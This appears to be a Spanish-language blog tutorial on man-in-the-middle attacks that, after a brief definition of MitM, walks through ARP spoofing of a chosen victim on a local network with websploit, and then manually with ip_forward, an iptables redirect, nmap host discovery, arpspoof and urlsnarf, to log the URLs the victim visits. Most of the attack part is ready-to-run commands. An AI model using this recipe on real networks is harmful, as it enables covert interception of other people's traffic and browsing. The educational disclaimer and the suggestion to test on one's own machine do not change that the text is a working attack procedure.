Disclamer
Este tutorial es con fines de obtener conocimiento sobre el tema a nivel basico,la ejecución del mismo esta bajo el criterio del leector.
Bien,este tutorial lo pueden efectuar incluso sobre su localhost asi que no hay mucho problema si no tienen una segunda maquina donde hacer las pruebas.
Primero que nada que es MitM:
En criptografía, un ataque man-in-the-middle o JANUS (MitM o intermediario, en español) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.
Ataques:
El ataque MitM puede incluir algunos de los siguientes subataques:
- Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
- Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
- Ataques de sustitución.
- Ataques de repetición.
- Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío periódico de mensajes de status autenticados.
Fuente : es.wikipedia.org
Lo que nosotros vamos a realizar en este tutorial es un eavesdropping pero solo el analisis de trafico a nivel "humano" ya que podemos ver los datos en hex,pero aquí veremos las url directas.
Tutorial
Un nivel Script Kiddies(automatizando con herramientas existentes),es el siguiente:
Usando websploit
Websploit nos probe una shell como la de Metasploit,como la que hice para ver los exif de una imagen.
Al ejecutar el programa:
websploitPodemos ver la ayuda con help,al igual que metasploit cuenta con diferentes modulos,nosotros usaremos una para MitM:
use network/mitm
Vemos las opciones:
show options
Como vemos tenemos algunas opcines,vamos a setearlas:
set interface interfaz
set router gateway
set target ip_victima
set sniffer urlsnarf
En interfaz es la interfaz de nuestra red,si estamos por cable ethx,si estamos por wirless,wlanx.
En router ponemos la puerta enlace,para verla desde consola:
netstat -nr
En target ponemos la ip victima,podemos obtenerla haciendo un scan rango 24 con nmap al gateway:
nmap -sP gateway/24
o podemos poner nuestra propia ip dinamica,para no molestar a alquien mas y hacer pruebas.
En sniffer ponemos urlsnarf,este programa nos mostrara las url que esta viendo la ip que asignamos en target.
Ahora solo ejecutamos con:
run
Ahora un nivel mas bajo,teclear todo nosotros mismos para ver por lo menos como se hace esto:
Primero que nada hacemos ip forward,en linux es tan facil como setear a uno la configuracion del archivo correspondiente:
echo 1 > /proc/sys/net/ipv4/ip_forward
Ahora tenemos que redirigir el trafico del puerto 80 basado en reglas de iptables,por ejemplo al puerto 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Con eso esta listo el enrutamiento.
Ahora vamos a ver lo necesario,gateway y target:
Gateway:
route | sed -n "3p"
Targets:
nmap -sP gateway/24 | grep --color for
Con eso tenemos la informacion necesaria.
Ahora solo falta la suplantacion de ARP:
arpspoof -i interfaz -t gateway ip_victima
Lo podemos hacer dual para no errar.
Ahora solo ejecutamos urlsnarf,para analizar las urls luego lo redirigiremos con un estándar de unix:
urlsnarf -i interfaz >> captura
cat capturaO podemos sacar las urls directamente con,una regex,por ejemplo con perl en una tuberia Unix:
cat captura | perl -lane 'while ($_ =~ m/\"(.+)\"/ig){ print $1."\n"}' | grep --color http://Eso es todo.
Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo
No hay comentarios.:
Publicar un comentario
Los comentarios serán revisados antes de ser publicados.